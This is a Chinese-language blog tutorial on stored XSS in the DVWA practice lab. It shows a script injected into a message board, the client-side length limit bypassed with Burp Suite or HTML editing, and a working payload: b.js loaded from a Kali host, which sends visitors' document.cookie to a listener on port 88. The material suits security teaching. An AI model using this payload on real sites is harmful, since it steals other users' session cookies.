二十五、XSS跨站攻击-(4)存储型xss

2017-12-15  本文已影响0人  cybeyond
                                   目录

1.特点
2.存储型xss盗取cookie

1、特点

在存储性跨站中,留言板Message里面输入一段js,然后点击提交,以后访问此页面的每个用户都会出现此弹出页。


输入js 存储型xss每次弹出
由于在网页Name中有字数限制,即存在Name客户端表单长度限制,因此没法直接输入js,可以通过burpsuite输入(防范的方法是不仅在客户端限制,也要在服务端限制) 输入js

点击go后,查看reponse报文,并通过“show reponse in browser”查看是否弹出xssed


在浏览器中查看响应url 点击copy 弹出xssed

2、存储型xss盗取cookie

首先在kali上写一段js脚本b.js,j将其放于/var/www/html/目录下,用于用户访问时能够被调用执行

var img = new Image();
img.src = "http://192.168.50.115:88/cookies.php?cookie="+document.cookie;

随后在kali上开启apache

#service apache2 start

测试能否访问到b.js


正常访问b.js

然后在kali上开启监听88端口


监听88端口

由于上面描述的,在dvwa的stored xss的name输入有长度限制,可以通过burpsuite,也可以通过html直接修改


找到name输入长度限制 修改长度限制为999

最后向其输入js代码

<script src=http://192.168.50.115/b.js></script>
输入js

点击提交,此时查看效果,js已经保存在服务端,其他用户点击就会将cookie发送到kali上

查看cookie1

从宿主机上,当点击此页面的时候,重新启动监听后,能够得到其他用户的cookie


查看cookie2
上一篇下一篇

猜你喜欢

热点阅读